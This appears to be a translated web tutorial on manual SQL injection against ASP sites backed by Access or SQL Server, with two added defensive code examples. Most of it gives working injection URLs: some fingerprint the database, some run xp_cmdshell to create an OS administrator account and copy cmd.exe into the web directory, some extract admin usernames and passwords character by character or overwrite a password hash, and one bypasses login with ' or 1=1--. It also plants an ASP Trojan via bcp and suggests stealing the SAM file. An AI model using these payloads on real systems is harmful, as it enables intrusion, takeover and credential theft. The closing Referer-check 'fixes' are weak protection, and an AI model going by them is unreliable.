The idea of SQL injection and the big advance of manual guessing

Source: Internet
Author: User

What is SQL injection?

Many web-site programs do not check the legality of user input when they are written, which leaves the application with a security risk. A user can submit database query code (usually in the browser address bar, through the normal WWW port) and, from the results the program returns, obtain data he wants to know. This is called SQL injection.

The idea of SQL injection

Thinking is the most important part. In fact, many people do not know what SQL can do. Here is a summary of the general idea of a SQL injection intrusion:

1. Judge whether a SQL injection vulnerability exists, that is, find the injection point.

2. Determine the back-end database type.

3. Determine whether xp_cmdshell can be executed. If the account of the current database connection has SA permission (the highest permission in SQL Server) and the extended stored procedure Master.dbo.xp_cmdshell (calling this stored procedure uses the operating system shell directly) can be executed correctly, the entire computer can be fully controlled by several methods and the injection is complete. Otherwise, continue with:

1. Discover the Web virtual directory

2. Upload an ASP Trojan

3. Get administrator privileges

Specific steps:

I. Judging the SQL injection vulnerability

If you have never done injection before, first untick "Show friendly HTTP error messages" under the IE menu Tools > Internet Options > Advanced.

To make the problem clear, the following uses HTTP://www.2cto.com/news.asp?id=xx (this address is hypothetical) as the example for analysis; xx may be an integer or a string.

1. Judging an integer parameter

When the input parameter xx is an integer, the SQL statement in news.asp usually looks like:

SELECT * FROM tablename WHERE field = xx

so the following steps can be used to test whether SQL injection exists.

The simplest way to judge:

HTTP://www.2cto.com/news.asp?id=xx' (append a single quotation mark)

The SQL statement in news.asp now becomes:

SELECT * FROM tablename WHERE field = xx'

If the program does not filter the "'", news.asp will report an exception. This method is very simple, but not the best, because:

First, not every IIS server returns the specific error message to the client. If the program contains a statement such as CInt(parameter), SQL injection will not succeed, but the server still reports an error; the specific message is "An error occurred on the server when processing the URL. Please contact the system administrator."

Second, most programmers now filter out the "'", so testing with "'" will not find the injection point. The classic 1=1 and 1=2 test is therefore generally used; see below:

HTTP://www.2cto.com/news.asp?id=xx and 1=1: news.asp runs normally,

and the result is the same as for HTTP://www.2cto.com/news.asp?id=xx;

HTTP://www.2cto.com/news.asp?id=xx and 1=2: news.asp runs abnormally (this is the classic 1=1 / 1=2 judging method).

If both of the above hold, news.asp has a SQL injection vulnerability; otherwise it probably cannot be injected.

2. Judging a string parameter

The method is basically the same as for the integer parameter.

When the input parameter xx is a string, the SQL statement in news.asp typically looks like:

SELECT * FROM tablename WHERE field = 'xx'

so the following steps can be used to test whether SQL injection exists.

HTTP://www.2cto.com/news.asp?id=xx' (append a single quotation mark); the SQL statement in news.asp becomes
SELECT * FROM tablename WHERE field = 'xx'' and news.asp runs abnormally;

HTTP://www.2cto.com/news.asp?id=xx' and '1'='1: news.asp runs normally,

and the result is the same as for HTTP://www.2cto.com/news.asp?id=xx;

HTTP://www.2cto.com/news.asp?id=xx' and '1'='2: news.asp runs abnormally.

If the above holds, news.asp has a SQL injection vulnerability; otherwise it cannot be injected.

3. Handling special cases

Sometimes an ASP programmer filters characters such as single quotes in the program to prevent SQL injection. Here are a few things to try in that case.

① Case mixing: because VBS is not case-sensitive, programmers often filter only the all-uppercase or only the all-lowercase string, while mixed case tends to be overlooked, such as using SeLeCt instead of SELECT or select;

② Unicode method: in IIS, internationalization is done with the Unicode character set, and the strings entered in IE can be converted into Unicode (URL-encoded) form, such as + = %2b, space = %20, and so on;

③ ASCII code method: some or all of the characters entered can be put

4. Besides the above methods, an easier way is to use off-the-shelf tools such as NBSI. The AH D injection tool is a very good tool; its latest version is currently 2.2.

II. Judging the database type

Different databases differ in their functions and injection methods, so before injecting we must determine the database type. The databases most commonly used with ASP are Access and SQL Server, which account for more than 99% of Web sites.

How do you get the program to tell you which database it uses? Consider:

SQL Server has some system variables that can be obtained directly from the error message when the IIS error prompt is not turned off on the server. If it returns error messages, the method is as follows:
HTTP://www.2cto.com/news.asp?id=xx;and user>0

This sentence is simple but contains the essence of the SQL Server-specific injection method; I found this highly efficient guessing method myself in an unintentional test. Let me explain what it means: the preceding statement is normal; the emphasis is on "and user>0". We know that user is a built-in variable of SQL Server whose value is the user name of the current connection, and whose type is nvarchar. When an nvarchar value is compared with the int 0, the system first tries to convert the nvarchar value to int, and that process will certainly fail. The SQL Server error message is: Syntax error converting the nvarchar value 'abc' to a column of data type int. Here abc is the value of the variable user, so the database user name is obtained without any effort. Later you will see many statements of this kind. By the way, as everyone knows, the SQL Server user sa is a role equivalent to the Administrators permission; once sa permission is obtained, the host's administrator can almost certainly be obtained. The above method is a very convenient test of whether the login is sa; note that if it is the sa login, the message says "dbo" cannot be converted to int, not "sa".

If server IIS does not allow returning error messages, how do you determine the database type? Start from Access and SQL Server: both have their own system tables, such as the table that holds all objects in the database. In Access it is the system table [msysobjects], but reading that table in a Web environment prompts "No permissions"; in SQL Server it is the table [sysobjects], which can be read normally in a Web environment.

Once you have confirmed that injection is possible, use the following statements:

HTTP://www.2cto.com/news.asp?id=xx; and (select count(*) from sysobjects) >0
HTTP://www.2cto.com/news.asp?id=xx; and (select count(*) from msysobjects) >0

If the database is SQL Server, the page for the first URL is roughly the same as the original page HTTP://www.2cto.com/news.asp?id=xx, and the second URL prompts an error because the table msysobjects is not found; even if the program has fault-tolerant handling, the page is completely different from the original.

If the database is Access, the situation is different: the page for the first URL differs from the original page, and for the second URL it depends on whether the database settings allow reading the system table, which generally they do not, so it is also completely different from the original. In most cases the first URL tells you the database type used by the system; the second URL should be used only as a confirmation when the IIS error prompt is turned on.

III. Determining the availability of xp_cmdshell

If the account of the current database connection has SA permission, and the extended stored procedure Master.dbo.xp_cmdshell (calling this stored procedure uses the operating system shell directly) can be executed correctly, the entire computer can be fully controlled by the following methods, and all subsequent steps can be skipped.

1. HTTP://www.2cto.com/news.asp?id=xx and user>0: news.asp runs abnormally but the user name of the current database connection can be obtained (dbo is displayed if it is sa).

2. HTTP://www.2cto.com/news.asp?id=xx and db_name()>0: news.asp runs abnormally but the database name of the current connection can be obtained.

3. HTTP://www.2cto.com/news.asp?id=xx;exec master..xp_cmdshell "net user aaa bbb /add"-- (master is the master database of SQL Server; the semicolon in the statement means SQL Server executes the statement before the semicolon and then the one after it, and "--" starts a comment, meaning everything after it is only a comment and is not executed by the system). This directly adds the operating system account aaa with password bbb.

4. HTTP://www.2cto.com/news.asp?id=xx;exec master..xp_cmdshell "net localgroup Administrators aaa /add"-- adds the account aaa just created to the Administrators group.

5. HTTP://www.2cto.com/news.asp?id=xx;backup database dbname to disk='c:\inetpub\wwwroot\save.db' backs up the database content into the Web directory, from which the file can be downloaded over HTTP (the Web virtual directory is best, of course).

6. Create a Unicode vulnerability by copying cmd:

HTTP://www.2cto.com/news.asp?id=xx;exec master.dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" creates a Unicode vulnerability; exploiting it completes the control of the entire computer (the Web virtual directory is best, of course).

With this you have successfully completed a SQL injection attack!

When the above conditions do not hold, continue with the following steps.

(i) Discovering the Web virtual directory

Only when the Web virtual directory has been found can the location of the ASP Trojan be determined and user permission be obtained. Two methods are more effective.

The first is guessing based on experience. In general the Web virtual directory is C:\inetpub\wwwroot, D:\inetpub\wwwroot or E:\inetpub\wwwroot, and the executable virtual directory is c:\inetpub\scripts, D:\inetpub\scripts, E:\inetpub\scripts, and so on.

The second is to traverse the system directory structure, analyze the results and discover the Web virtual directory:

First create a temporary table, temp:

HTTP://www.2cto.com/news.asp?id=xx;create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--

Next:

1. Use xp_availablemedia to get all current drives and save them in the temp table:

HTTP://www.2cto.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

The list of drives and related information can then be obtained by querying the contents of temp.

2. Use xp_subdirs to get the list of subdirectories and store them in the temp table:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id) exec master.dbo.xp_subdirs 'c:\';--

3. Use xp_dirtree to get the directory tree of all subdirectories and store it in the temp table:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id,num1) exec master.dbo.xp_dirtree 'c:\';--

This lets you browse the list of all directories (folders).

If you need to view the contents of a file, this can be done by executing xp_cmdshell:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

The BULK INSERT syntax can also insert a text file into the temporary table. Example: BULK INSERT temp (id) FROM 'c:\inetpub\wwwroot\index.asp'
Browse temp to see the contents of the index.asp file! By analyzing various ASP files, a lot of system information, Web construction and management information, and even the connection password of the SA account can be obtained.

Of course, if xp_cmdshell can be executed, it can be used to complete this:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:';--
HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--

Through xp_cmdshell we can see everything we want to see, including W3SVC:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id) exec master.dbo.xp_cmdshell 'cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc';--

However, without SA permission, the following can still be used:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (id,num1) exec master.dbo.xp_dirtree 'c:\';--

Attention:

1. After each browse, delete all content in temp; the method is:

HTTP://www.2cto.com/news.asp?id=xx;delete from temp;--

2. The method of browsing the temp table is (assuming TestDB is the name of the current connection's database):
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp)>0

This takes the value of the id field of the first record in table temp and compares it with an integer; obviously news.asp reports an exception, but the value of the id field can be found in the exception. Assuming the value found is xyz, then

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp where id not in ('xyz'))>0

gets the value of the id field of the second record in table temp.
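Every probe in sections I to (i) leaves a distinctive query string in the Web server log, which is where a defender can catch this activity. The block below is an added example, not code from the original article: it parses constructed IIS-style log lines (assumed W3C field order: date, time, client IP, method, URI stem, query, status), URL-decodes the query so that the "Unicode method" encoding does not hide anything, tags the probes the article describes, and flags clients that ran the 1=1 / 1=2 pair with differing responses.

```python
"""Detect the manual probes from sections I to (i) in IIS-style request logs.

Added example, not part of the original article. The log lines are constructed
(W3C fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status); the
signatures mirror the probes the article walks through: trailing quote,
and 1=1 / 1=2, and user>0, sysobjects / msysobjects lookups, stacked
exec master..xp_cmdshell, xp_dirtree / xp_subdirs, BULK INSERT.
"""
import re
from urllib.parse import unquote_plus

LOG_LINE = re.compile(r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
                      r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$")

# Matched against the URL-decoded, lower-cased query string, so %27 / %20
# encoding (the article's "Unicode method") does not hide the probe.
SIGNATURES = {
    "trailing_quote": re.compile(r"=[^&]*'\s*(?:&|$)"),
    "identity_probe": re.compile(r"\b(?:user|db_name\(\))\s*>\s*\d"),
    "db_fingerprint": re.compile(r"\bfrom\s+(?:m?sysobjects|sysdatabases|syscolumns)\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "filesystem_xp": re.compile(r"\bxp_(?:dirtree|subdirs|availablemedia)\b"),
    "bulk_insert": re.compile(r"\bbulk\s+insert\b"),
    "stacked_statement": re.compile(r";\s*(?:exec|insert|create|delete|update|backup)\b"),
}
BOOLEAN_PROBE = re.compile(r"\band\s+(?:(\d+)\s*=\s*(\d+)|'([^']*)'\s*=\s*'([^'\s]*))")


def boolean_probe(decoded):
    """'true' for and 1=1 / and '1'='1, 'false' for and 1=2 / and '1'='2, else None."""
    m = BOOLEAN_PROBE.search(decoded)
    if not m:
        return None
    left, right = (m.group(1), m.group(2)) if m.group(1) is not None else (m.group(3), m.group(4))
    return "true" if left == right else "false"


def parse_line(line):
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded"] = "" if rec["query"] == "-" else unquote_plus(rec["query"]).lower()
    return rec


def classify(decoded):
    """Names of every signature the decoded query string triggers."""
    tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    probe = boolean_probe(decoded)
    if probe:
        tags.append("boolean_probe_" + probe)
    return tags


def scan_log(lines):
    """One finding per request that triggers at least one signature."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["decoded"])
        if tags:
            findings.append({"ip": rec["ip"], "stem": rec["stem"], "status": rec["status"],
                             "tags": tags, "query": rec["decoded"]})
    return findings


def boolean_pair_clients(findings):
    """Clients that sent both a true and a false boolean probe to the same page and
    got different status codes: the article's 1=1 / 1=2 test seen from the server
    side. A lone 'and 1=1' is not enough to flag a client."""
    seen = {}
    for f in findings:
        for tag in f["tags"]:
            if tag.startswith("boolean_probe_"):
                seen.setdefault((f["ip"], f["stem"]), {})[tag[len("boolean_probe_"):]] = f["status"]
    return sorted({ip for (ip, _), s in seen.items()
                   if "true" in s and "false" in s and s["true"] != s["false"]})


# Constructed sample log: one client working through the article's probes,
# another sending a single harmless-looking 1=1.
SAMPLE_LOG = """\
2024-03-01 10:00:01 203.0.113.5 GET /news.asp id=12 200
2024-03-01 10:00:02 203.0.113.5 GET /news.asp id=12%27 500
2024-03-01 10:00:03 203.0.113.5 GET /news.asp id=12%20and%201=1 200
2024-03-01 10:00:04 203.0.113.5 GET /news.asp id=12%20and%201=2 500
2024-03-01 10:00:05 203.0.113.5 GET /news.asp id=12%20and%20user%3E0 500
2024-03-01 10:00:06 203.0.113.5 GET /news.asp id=12;and%20(select%20count(*)%20from%20sysobjects)%3E0 200
2024-03-01 10:00:07 203.0.113.5 GET /news.asp id=12;exec%20master..xp_cmdshell%20%27dir%20c:%27-- 500
2024-03-01 10:00:08 198.51.100.9 GET /news.asp id=77 200
2024-03-01 10:00:09 198.51.100.9 GET /news.asp id=77%20and%201=1 200
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["tags"], f["query"])
    print("boolean pair from:", boolean_pair_clients(scan_log(SAMPLE_LOG)))
```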

(ii) Uploading an ASP Trojan

The so-called ASP Trojan is ASP code with special functions; it is placed under the scripts directory of the Web virtual directory, remote clients can execute it through IE, and it then obtains user rights on the system, achieving initial control. There are two more effective ways to upload an ASP Trojan:

1. Using the site's remote management functions

Many Web sites provide remote management for ease of maintenance, and on many Web sites different users have different access rights to the content. To control user rights there is a Web page that asks for a user name and password; only after the correct values are entered can one proceed to the next step and manage the site, such as uploading and downloading files, browsing directories and modifying the configuration.

Therefore, obtaining the correct user name and password not only allows uploading an ASP Trojan, but sometimes even gives user permission to browse the system directly, so the complex "Discovering the Web virtual directory" step above can be omitted.

The user name and password are usually stored in a single table; finding that table and reading its contents solves the problem. Two effective methods are given below.

A. Injection method:

In theory, the authentication Web page contains a statement of the form:

SELECT * FROM admin WHERE username='XXX' AND password='YYY'

If the necessary character filtering is not performed before this statement is actually run, SQL injection is easy to carry out.

For example, in the User Name text box enter: abc' or 1=1-- and in the Password box enter: 123. The SQL statement becomes:

SELECT * FROM admin WHERE username='abc' or 1=1-- and password='123'

Regardless of what user name and password the user enters, this statement is always executed correctly, so the user easily fools the system and obtains a legitimate identity.

B. Guessing method:

The basic idea is to guess the names of all the databases, guess each table name in the database, work out which table holds the user names and passwords, guess each field name in that table, and then guess the contents of each record in the table.

a. Guess all database names

HTTP://www.2cto.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <> 0

Because dbid values 1 to 5 are used by the system, user-created databases must start from 6. And since we submitted name>1 (the name field is a character type, so comparing it with a number causes an error), news.asp reports an exception and the first database name can be obtained. Likewise, changing dbid to 7, 8, 9, 10, 11, 12 ... obtains all database names.

The following assumes the database name found is TestDB.

b. Guess the name of the user table in the database

Guessing method: this method guesses the table name from personal experience; in general the names are user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts and so on, and they are checked with the statement

HTTP://www.2cto.com/news.asp?id=xx and (select count(*) from TestDB.dbo.tablename)>0

If the table name exists, news.asp works normally, otherwise it reports an exception. Loop like this until the name of the system account table is guessed.

Reading method: SQL Server has a table sysobjects that holds the core information of the system; all tables, views and so on of a database are recorded in this table, and this table can be accessed through the Web.

Rows where xtype='U' and status>0 represent tables created by the user. By finding and analyzing the tables created by each user, the name of the user table can be obtained. The basic implementation is:

① HTTP://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0)>0
gets the name of the first user-created table and compares it with an integer; obviously news.asp reports an exception, but the table name can be found in the exception. Assuming the table name found is xyz, then

② HTTP://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz'))>0
gets the name of the second user-created table; in the same way the names of all user-created tables can be obtained.

From the table names it is generally possible to determine which table holds the user names and passwords; the following assumes this table is named admin.
c. Guess the names of the user name field and the password field

The admin table must have a user name field and a password field; only with the names of these two fields is it possible to get their contents. There are again two ways to get their names.

Guessing method: this method guesses the field names from personal experience. In general the user name field is commonly named username, name, user, account and so on, and the password field is commonly named password, pass, pwd, passwd and so on. They are checked with the statement

HTTP://www.2cto.com/news.asp?id=xx and (select count(fieldname) from TestDB.dbo.admin)>0

"SELECT count(fieldname) FROM tablename" returns the number of rows in the table, so if the field name exists news.asp works normally, otherwise it reports an exception. Loop like this until the names of the two fields are guessed.

Reading method: the basic implementation is

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0
select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects fetches the first field name of a known table from sysobjects; when it is compared with an integer, news.asp obviously reports an exception, but the field name can be found in the exception. Replacing the 1 in col_name(object_id('admin'),1) with 2, 3, 4, 5, 6 ... in turn obtains all the field names.

d. Guess the user name and password

The most common and effective way to guess the contents of the user name and password is:

ASCII code character-by-character decoding: although this method is slow, it is certainly feasible. The basic idea is to guess the length of the field first, then guess the value of each position in turn. Guessing the user name and guessing the password work the same way; the process is illustrated below with the user name.

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=x (x = 1, 2, 3, 4, 5, ... n; username is the name of the user name field and admin is the table name). If news.asp runs normally for some value i of x, then i is the length of the first user name. For example, when entering
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8 news.asp works correctly, so the first user name has length 8.

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m ranges from 1 to the user name length obtained in the previous step, guessing separately for m = 1, 2, 3, ...; n is the ASCII value of 1~9, A~Z, a~z, or any value between 1~128; admin is the name of the system user account table). If news.asp runs normally for some value i of n, then the character with ASCII code i is the value at that position of the user name. For example, when entering
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80 news.asp works normally, so the third character of the user name is P (the ASCII code of P is 80); when HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33 makes news.asp work normally, the 9th character of the user name is ! (the ASCII code of ! is 33). Once the first user name and password are guessed, all the other user names and passwords can be guessed. Note: sometimes the password obtained may be encrypted with MD5 or similar and needs to be decrypted with special tools; or change the password first, use it, and then change it back, as described below.

Simpler method: guess the user name with HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1), where flag is a field in the admin table and username is the user name field; news.asp then works abnormally, but the username value can be obtained. In the same way a second user name, a third user name and so on can be obtained until all the user names in the table are known.

Guess the user password: HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1), where flag is a field in the admin table and pwd is the password field; news.asp then works abnormally, but the value of pwd can be obtained. In the same way the password of the second user, the third user and so on can be obtained until the passwords of all users in the table are known. Passwords are sometimes MD5-encrypted and can be dealt with by changing the password:

HTTP://www.2cto.com/news.asp?id=xx;update TestDB.dbo.admin set pwd='a0b923820dcc509a' where username='www';-- (a0b923820dcc509a is the MD5 value of 1, so this changes the password to 1; www is the known user name). In the same way the password can of course be changed back to its original value.

2. Using the function that exports table contents to a file

SQL Server has a bcp command that can export the contents of a table into a text file placed at a specified location. With this feature we can build a temporary table, insert an ASP Trojan as a row in the table, and then export it as an ASP file with the bcp command.

The command line format is as follows:

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp -c -S localhost -U sa -P foobar
(The -S parameter is the server that executes the query, -U is the user name, -P is the password, and the uploaded result is the 163.asp Trojan)

3. Using tools such as NBSI. Some reference data; the most important table names:

select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

Some of the most important user names (existing in the default SQL database):

public
dbo
guest (generally disabled, or not authorized)
db_securityadmin
db_ddladmin

Some default extended stored procedures:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia (drive related)
xp_dirtree (directories)
xp_enumdsn (ODBC connections)
xp_loginconfig (server security mode information)
xp_makecab (create a compressed archive)
xp_ntsec_enumdomains (domain information)
xp_terminate_process (terminate a process, given a PID)
(iii) Obtaining system administrator rights

An ASP Trojan only has user permissions; to obtain full control of the system, system administrator rights are also needed. What to do? There are many ways to elevate permissions:

Upload a Trojan and modify the .ini file that runs automatically at boot (once the system restarts, it is finished);

Copy cmd.exe to scripts and artificially create a Unicode vulnerability;

Download the SAM file, crack it and get all the OS user names and passwords;

And so on; depending on the specific situation of the system, different methods can be taken.

So how do we prevent injection? The following can be added to ASP, HTML, PHP or CGI programs; they have been tested. Add them at the beginning of the top.asp file.

Method one (as soon as there is a user injection, redirect to the ../../ directory):

<%
If Session("username") = "" Or Session("UserKey") = "" Then
    Response.Redirect "../../"
End If
%>

Method two (as soon as a user injection is judged to be an external connection):

<%
Server_v1 = CStr(Request.ServerVariables("HTTP_REFERER"))
Server_v2 = CStr(Request.ServerVariables("SERVER_NAME"))
' Compare the host part of the Referer (the characters after "http://") with this server's name
If Mid(Server_v1, 8, Len(Server_v2)) <> Server_v2 Then
    Response.Write "You submitted the wrong path; submitting data from outside the site is prohibited. Please do not tamper with this parameter!"
    Response.End
End If
%>

Method three (as soon as there is a user injection, redirect to the ../ directory):

<%
Dim From_url, Serv_url
From_url = CStr(Request.ServerVariables("HTTP_REFERER"))
Serv_url = CStr(Request.ServerVariables("SERVER_NAME"))
If Mid(From_url, 8, Len(Serv_url)) <> Serv_url Then
    Response.Write "NO"
    Response.Redirect "../"
    Response.End
End If
%>
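The three checks above gate who may reach the page, but none of them changes the query itself: the Referer header is supplied by the client, and a session check does nothing for the login page. The durable fix for the login statement in section (ii) A and for the news.asp?id=xx lookup is to bind user input as a parameter instead of splicing it into the SQL text. The block below is an added example, not code from the original article; it uses an in-memory SQLite database as a stand-in for the SQL Server tables, keeps the article's admin / username / password names and the 1=1 / 1=2 inputs, and the rows are constructed.

```python
"""String-spliced queries beside their parameterized form.

Added example, not from the original article. SQLite stands in for the
SQL Server tables the article discusses; the 'admin' table with its
'username' / 'password' fields and the news.asp?id=xx lookup are the
article's own, the rows are constructed.
"""
import sqlite3


def make_db():
    """In-memory database with one constructed admin row and one news row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (username text, password text)")
    conn.execute("create table news (id integer, title text)")
    conn.execute("insert into admin values ('www', 's3cret')")
    conn.execute("insert into news values (12, 'first')")
    return conn


def login_spliced(conn, username, password):
    """Vulnerable: the statement the article shows, built by concatenation.
    The input abc' or 1=1-- turns it into ... username='abc' or 1=1-- ...,
    so the password check is commented out and a row always matches."""
    sql = ("select * from admin where username='" + username
           + "' and password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened: bound parameters are data, never SQL syntax."""
    sql = "select * from admin where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def news_spliced(conn, id_param):
    """Vulnerable integer parameter: 'xx and 1=1' / 'xx and 1=2' change the
    result, which is exactly the article's 1=1 / 1=2 judgement."""
    return conn.execute("select title from news where id=" + id_param).fetchall()


def news_hardened(conn, id_param):
    """Hardened: the CInt()-style check the article mentions, then a bound
    parameter. Returns None for anything that is not an integer."""
    try:
        news_id = int(id_param)
    except ValueError:
        return None
    return conn.execute("select title from news where id=?", (news_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("spliced login bypassed:", login_spliced(db, "abc' or 1=1--", "123"))
    print("parameterized login bypassed:", login_parameterized(db, "abc' or 1=1--", "123"))
    print("spliced 1=1:", news_spliced(db, "12 and 1=1"), "1=2:", news_spliced(db, "12 and 1=2"))
    print("hardened:", news_hardened(db, "12 and 1=1"))
```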

